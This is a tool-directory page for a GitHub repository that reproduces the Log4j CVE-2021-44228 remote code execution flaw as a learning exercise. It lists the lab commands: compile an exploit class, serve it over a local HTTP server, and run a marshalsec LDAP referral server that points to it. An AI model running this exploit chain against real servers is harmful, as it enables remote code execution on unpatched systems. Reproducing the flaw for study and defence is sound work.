Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Log4j-Rec-CVE-2021-44228 — Apache Log4j CVE-2021-44228 漏洞复现 | Kitploit
Tools/GitHubGitHub/zhangxvx/log4j-rec-cve-2021-44228
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubzhangxvx/log4j-rec-cve-2021-44228

Log4j-Rec-CVE-2021-44228

Apache Log4j CVE-2021-44228 漏洞复现

View Repository
4 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Log4j2 Replication Notes, For Learning Only

Reference: https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

Create Executable File

root@kitploit:~
com/example/template

javac Log4jRCE.java

Start Python Built-in HTTP Server

root@kitploit:~
com/example/template
python -m http.server 8888

Start LDAP Server

root@kitploit:~
tools
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"

Simulate Injection Attack Submit Form

root@kitploit:~
com/example/hack/Hack.java
Download Tool